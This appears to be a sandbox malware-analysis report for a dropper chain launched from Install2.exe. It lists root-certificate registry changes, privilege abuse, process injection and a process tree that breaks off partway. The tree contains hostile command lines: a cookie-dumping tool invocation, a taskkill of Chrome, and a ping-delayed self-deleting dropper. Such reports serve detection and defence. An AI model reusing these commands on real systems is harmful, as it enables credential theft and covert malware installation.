Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4360	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4056	ultramediaburner.tmp
4056	ultramediaburner.tmp
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe
1432	Rulypihopi.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2824	Process not Found

Suspicious behavior: MapViewOfSection 48 IoCs

pid	Process
4984	MicrosoftEdgeCP.exe
4984	MicrosoftEdgeCP.exe
6112	toolspab1.exe
5988	42a25820.exe
2824	Process not Found
2824	Process not Found
2824	Process not Found
2824	Process not Found
2824	Process not Found
2824	Process not Found
2824	Process not Found
2824	Process not Found
2824	Process not Found
2824	Process not Found
2824	Process not Found
2824	Process not Found
2824	Process not Found
2824	Process not Found
2824	Process not Found
2824	Process not Found
2824	Process not Found
2824	Process not Found
2232	bsgesfv
4964	svgesfv
5868	explorer.exe
5868	explorer.exe
5868	explorer.exe
5868	explorer.exe
5148	explorer.exe
5148	explorer.exe
5148	explorer.exe
5148	explorer.exe
6088	explorer.exe
6088	explorer.exe
6088	explorer.exe
6088	explorer.exe
5900	MicrosoftEdgeCP.exe
5900	MicrosoftEdgeCP.exe
5868	explorer.exe
5868	explorer.exe
5148	explorer.exe
5148	explorer.exe
6088	explorer.exe
6088	explorer.exe
5248	bsgesfv
5404	svgesfv
6092	bsgesfv
4580	svgesfv

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2892	Ultra.exe
Token: SeDebugPrivilege	1900	Qitucuxyno.exe
Token: SeDebugPrivilege	1432	Rulypihopi.exe
Token: SeDebugPrivilege	748	MicrosoftEdge.exe
Token: SeDebugPrivilege	748	MicrosoftEdge.exe
Token: SeDebugPrivilege	748	MicrosoftEdge.exe
Token: SeDebugPrivilege	748	MicrosoftEdge.exe
Token: SeDebugPrivilege	4500	KiffMainE1.exe
Token: SeDebugPrivilege	1564	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	1564	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	1564	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	1564	MicrosoftEdgeCP.exe
Token: SeSecurityPrivilege	4896	msiexec.exe
Token: SeCreateTokenPrivilege	5024	installer.exe
Token: SeAssignPrimaryTokenPrivilege	5024	installer.exe
Token: SeLockMemoryPrivilege	5024	installer.exe
Token: SeIncreaseQuotaPrivilege	5024	installer.exe
Token: SeMachineAccountPrivilege	5024	installer.exe
Token: SeTcbPrivilege	5024	installer.exe
Token: SeSecurityPrivilege	5024	installer.exe
Token: SeTakeOwnershipPrivilege	5024	installer.exe
Token: SeLoadDriverPrivilege	5024	installer.exe
Token: SeSystemProfilePrivilege	5024	installer.exe
Token: SeSystemtimePrivilege	5024	installer.exe
Token: SeProfSingleProcessPrivilege	5024	installer.exe
Token: SeIncBasePriorityPrivilege	5024	installer.exe
Token: SeCreatePagefilePrivilege	5024	installer.exe
Token: SeCreatePermanentPrivilege	5024	installer.exe
Token: SeBackupPrivilege	5024	installer.exe
Token: SeRestorePrivilege	5024	installer.exe
Token: SeShutdownPrivilege	5024	installer.exe
Token: SeDebugPrivilege	5024	installer.exe
Token: SeAuditPrivilege	5024	installer.exe
Token: SeSystemEnvironmentPrivilege	5024	installer.exe
Token: SeChangeNotifyPrivilege	5024	installer.exe
Token: SeRemoteShutdownPrivilege	5024	installer.exe
Token: SeUndockPrivilege	5024	installer.exe
Token: SeSyncAgentPrivilege	5024	installer.exe
Token: SeEnableDelegationPrivilege	5024	installer.exe
Token: SeManageVolumePrivilege	5024	installer.exe
Token: SeImpersonatePrivilege	5024	installer.exe
Token: SeCreateGlobalPrivilege	5024	installer.exe
Token: SeCreateTokenPrivilege	5024	installer.exe
Token: SeAssignPrimaryTokenPrivilege	5024	installer.exe
Token: SeLockMemoryPrivilege	5024	installer.exe
Token: SeIncreaseQuotaPrivilege	5024	installer.exe
Token: SeMachineAccountPrivilege	5024	installer.exe
Token: SeTcbPrivilege	5024	installer.exe
Token: SeSecurityPrivilege	5024	installer.exe
Token: SeTakeOwnershipPrivilege	5024	installer.exe
Token: SeLoadDriverPrivilege	5024	installer.exe
Token: SeSystemProfilePrivilege	5024	installer.exe
Token: SeSystemtimePrivilege	5024	installer.exe
Token: SeProfSingleProcessPrivilege	5024	installer.exe
Token: SeIncBasePriorityPrivilege	5024	installer.exe
Token: SeCreatePagefilePrivilege	5024	installer.exe
Token: SeCreatePermanentPrivilege	5024	installer.exe
Token: SeBackupPrivilege	5024	installer.exe
Token: SeRestorePrivilege	5024	installer.exe
Token: SeShutdownPrivilege	5024	installer.exe
Token: SeDebugPrivilege	5024	installer.exe
Token: SeAuditPrivilege	5024	installer.exe
Token: SeSystemEnvironmentPrivilege	5024	installer.exe
Token: SeChangeNotifyPrivilege	5024	installer.exe

Suspicious use of FindShellTrayWindow 10 IoCs

pid	Process
4056	ultramediaburner.tmp
5024	installer.exe
2824	Process not Found
2824	Process not Found
2824	Process not Found
2824	Process not Found
2824	Process not Found
2824	Process not Found
2824	Process not Found
2824	Process not Found

Suspicious use of SetWindowsHookEx 9 IoCs

pid	Process
748	MicrosoftEdge.exe
4984	MicrosoftEdgeCP.exe
4984	MicrosoftEdgeCP.exe
5016	powershell.exe
5016	powershell.exe
5504	Conhost.exe
6080	MicrosoftEdge.exe
5900	MicrosoftEdgeCP.exe
5900	MicrosoftEdgeCP.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
2824	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3892 wrote to memory of 1924	3892	Install2.exe	75
PID 3892 wrote to memory of 1924	3892	Install2.exe	75
PID 3892 wrote to memory of 1924	3892	Install2.exe	75
PID 1924 wrote to memory of 2892	1924	Install2.tmp	77
PID 1924 wrote to memory of 2892	1924	Install2.tmp	77
PID 2892 wrote to memory of 3868	2892	Ultra.exe	80
PID 2892 wrote to memory of 3868	2892	Ultra.exe	80
PID 2892 wrote to memory of 3868	2892	Ultra.exe	80
PID 3868 wrote to memory of 4056	3868	ultramediaburner.exe	81
PID 3868 wrote to memory of 4056	3868	ultramediaburner.exe	81
PID 3868 wrote to memory of 4056	3868	ultramediaburner.exe	81
PID 2892 wrote to memory of 1900	2892	Ultra.exe	82
PID 2892 wrote to memory of 1900	2892	Ultra.exe	82
PID 4056 wrote to memory of 2128	4056	ultramediaburner.tmp	83
PID 4056 wrote to memory of 2128	4056	ultramediaburner.tmp	83
PID 2892 wrote to memory of 1432	2892	Ultra.exe	84
PID 2892 wrote to memory of 1432	2892	Ultra.exe	84
PID 1432 wrote to memory of 4280	1432	Rulypihopi.exe	90
PID 1432 wrote to memory of 4280	1432	Rulypihopi.exe	90
PID 4280 wrote to memory of 4500	4280	cmd.exe	92
PID 4280 wrote to memory of 4500	4280	cmd.exe	92
PID 1432 wrote to memory of 4664	1432	Rulypihopi.exe	93
PID 1432 wrote to memory of 4664	1432	Rulypihopi.exe	93
PID 1432 wrote to memory of 4816	1432	Rulypihopi.exe	95
PID 1432 wrote to memory of 4816	1432	Rulypihopi.exe	95
PID 4664 wrote to memory of 4916	4664	cmd.exe	97
PID 4664 wrote to memory of 4916	4664	cmd.exe	97
PID 4664 wrote to memory of 4916	4664	cmd.exe	97
PID 4816 wrote to memory of 5024	4816	cmd.exe	99
PID 4816 wrote to memory of 5024	4816	cmd.exe	99
PID 4816 wrote to memory of 5024	4816	cmd.exe	99
PID 1432 wrote to memory of 4352	1432	Rulypihopi.exe	101
PID 1432 wrote to memory of 4352	1432	Rulypihopi.exe	101
PID 4352 wrote to memory of 4532	4352	cmd.exe	103
PID 4352 wrote to memory of 4532	4352	cmd.exe	103
PID 4352 wrote to memory of 4532	4352	cmd.exe	103
PID 4532 wrote to memory of 4772	4532	gpooe.exe	104
PID 4532 wrote to memory of 4772	4532	gpooe.exe	104
PID 4532 wrote to memory of 4772	4532	gpooe.exe	104
PID 4896 wrote to memory of 4108	4896	msiexec.exe	107
PID 4896 wrote to memory of 4108	4896	msiexec.exe	107
PID 4896 wrote to memory of 4108	4896	msiexec.exe	107
PID 4984 wrote to memory of 1564	4984	MicrosoftEdgeCP.exe	100
PID 4984 wrote to memory of 1564	4984	MicrosoftEdgeCP.exe	100
PID 4984 wrote to memory of 1564	4984	MicrosoftEdgeCP.exe	100
PID 5024 wrote to memory of 4920	5024	installer.exe	108
PID 5024 wrote to memory of 4920	5024	installer.exe	108
PID 5024 wrote to memory of 4920	5024	installer.exe	108
PID 4896 wrote to memory of 4468	4896	msiexec.exe	109
PID 4896 wrote to memory of 4468	4896	msiexec.exe	109
PID 4896 wrote to memory of 4468	4896	msiexec.exe	109
PID 4532 wrote to memory of 4784	4532	gpooe.exe	110
PID 4532 wrote to memory of 4784	4532	gpooe.exe	110
PID 4532 wrote to memory of 4784	4532	gpooe.exe	110
PID 4468 wrote to memory of 3840	4468	MsiExec.exe	205
PID 4468 wrote to memory of 3840	4468	MsiExec.exe	205
PID 4468 wrote to memory of 3840	4468	MsiExec.exe	205
PID 4984 wrote to memory of 1564	4984	MicrosoftEdgeCP.exe	100
PID 4984 wrote to memory of 1564	4984	MicrosoftEdgeCP.exe	100
PID 4984 wrote to memory of 1564	4984	MicrosoftEdgeCP.exe	100
PID 4984 wrote to memory of 1564	4984	MicrosoftEdgeCP.exe	100
PID 4984 wrote to memory of 1564	4984	MicrosoftEdgeCP.exe	100
PID 4984 wrote to memory of 1564	4984	MicrosoftEdgeCP.exe	100
PID 4984 wrote to memory of 1564	4984	MicrosoftEdgeCP.exe	100

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1372

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1908

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1340

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1200

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2492

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1084

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2544

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:340
- C:\Users\Admin\AppData\Roaming\bsgesfv
  C:\Users\Admin\AppData\Roaming\bsgesfv
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:2232
- C:\Users\Admin\AppData\Roaming\svgesfv
  C:\Users\Admin\AppData\Roaming\svgesfv
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4520
- - C:\Users\Admin\AppData\Roaming\svgesfv
    C:\Users\Admin\AppData\Roaming\svgesfv
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:4964
- C:\Users\Admin\AppData\Roaming\bsgesfv
  C:\Users\Admin\AppData\Roaming\bsgesfv
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:5248
- C:\Users\Admin\AppData\Roaming\svgesfv
  C:\Users\Admin\AppData\Roaming\svgesfv
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4656
- - C:\Users\Admin\AppData\Roaming\svgesfv
    C:\Users\Admin\AppData\Roaming\svgesfv
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:5404
- C:\Users\Admin\AppData\Roaming\bsgesfv
  C:\Users\Admin\AppData\Roaming\bsgesfv
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:6092
- C:\Users\Admin\AppData\Roaming\svgesfv
  C:\Users\Admin\AppData\Roaming\svgesfv
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5312
- - C:\Users\Admin\AppData\Roaming\svgesfv
    C:\Users\Admin\AppData\Roaming\svgesfv
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:4580
- C:\Windows\system32\rundll32.exe
  C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\ogdtzM\ogdtzM.dll",ogdtzM
  2⤵
  - Windows security modification
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:6112

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:996

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2604

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2740

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2724

C:\Users\Admin\AppData\Local\Temp\Install2.exe
"C:\Users\Admin\AppData\Local\Temp\Install2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3892
- C:\Users\Admin\AppData\Local\Temp\is-DDMTR.tmp\Install2.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-DDMTR.tmp\Install2.tmp" /SL5="$301CC,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install2.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1924
- - C:\Users\Admin\AppData\Local\Temp\is-VJV2G.tmp\Ultra.exe
    "C:\Users\Admin\AppData\Local\Temp\is-VJV2G.tmp\Ultra.exe" /S /UID=burnerch1
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2892
  - - C:\Program Files\Microsoft Office\AXXBGMQBXU\ultramediaburner.exe
      "C:\Program Files\Microsoft Office\AXXBGMQBXU\ultramediaburner.exe" /VERYSILENT
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3868
    - - C:\Users\Admin\AppData\Local\Temp\is-V2DBC.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-V2DBC.tmp\ultramediaburner.tmp" /SL5="$7005A,281924,62464,C:\Program Files\Microsoft Office\AXXBGMQBXU\ultramediaburner.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:4056
      - C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        6⤵
        Executes dropped EXE
        
        PID:2128
  - - C:\Users\Admin\AppData\Local\Temp\f6-bda8f-56e-fdf91-6fcf2b555d298\Qitucuxyno.exe
      "C:\Users\Admin\AppData\Local\Temp\f6-bda8f-56e-fdf91-6fcf2b555d298\Qitucuxyno.exe"
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Suspicious use of AdjustPrivilegeToken
      PID:1900
  - - C:\Users\Admin\AppData\Local\Temp\4b-81a3a-0b2-53290-0fb33d1cfb89b\Rulypihopi.exe
      "C:\Users\Admin\AppData\Local\Temp\4b-81a3a-0b2-53290-0fb33d1cfb89b\Rulypihopi.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1432
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cwsj2p0j.hkd\KiffMainE1.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4280
      - C:\Users\Admin\AppData\Local\Temp\cwsj2p0j.hkd\KiffMainE1.exe
        
        C:\Users\Admin\AppData\Local\Temp\cwsj2p0j.hkd\KiffMainE1.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4500
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2tptxgvf.yav\001.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4664
      - C:\Users\Admin\AppData\Local\Temp\2tptxgvf.yav\001.exe
        
        C:\Users\Admin\AppData\Local\Temp\2tptxgvf.yav\001.exe
        6⤵
        Executes dropped EXE
        
        PID:4916
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zdu4rifi.hmf\installer.exe /qn CAMPAIGN="654" & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4816
      - C:\Users\Admin\AppData\Local\Temp\zdu4rifi.hmf\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\zdu4rifi.hmf\installer.exe /qn CAMPAIGN="654"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:5024
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\zdu4rifi.hmf\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\zdu4rifi.hmf\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619879508 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        7⤵
        
        PID:4920
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0kdnhjpr.zwm\gpooe.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4352
      - C:\Users\Admin\AppData\Local\Temp\0kdnhjpr.zwm\gpooe.exe
        
        C:\Users\Admin\AppData\Local\Temp\0kdnhjpr.zwm\gpooe.exe
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:4532
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:4772
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:4784
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:5164
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:5852
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eeo1ne4g.e4l\google-game.exe & exit
        5⤵
        
        PID:5236
      - C:\Users\Admin\AppData\Local\Temp\eeo1ne4g.e4l\google-game.exe
        
        C:\Users\Admin\AppData\Local\Temp\eeo1ne4g.e4l\google-game.exe
        6⤵
        
        PID:5016
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
        7⤵
        Loads dropped DLL
        
        PID:5328
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fl5jtcuq.zl4\askinstall39.exe & exit
        5⤵
        
        PID:6140
      - C:\Users\Admin\AppData\Local\Temp\fl5jtcuq.zl4\askinstall39.exe
        
        C:\Users\Admin\AppData\Local\Temp\fl5jtcuq.zl4\askinstall39.exe
        6⤵
        Executes dropped EXE
        
        PID:4836
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        7⤵
        
        PID:4968
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        8⤵
        Kills process with taskkill
        
        PID:5844
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ixruao1.lkx\setup.exe & exit
        5⤵
        
        PID:4884
      - C:\Users\Admin\AppData\Local\Temp\5ixruao1.lkx\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\5ixruao1.lkx\setup.exe
        6⤵
        Executes dropped EXE
        
        PID:5340
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\5ixruao1.lkx\setup.exe"
        7⤵
        
        PID:4324
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        8⤵
        Runs ping.exe
        
        PID:4360
    - - C:\Windows\System32\cmd.exe
        
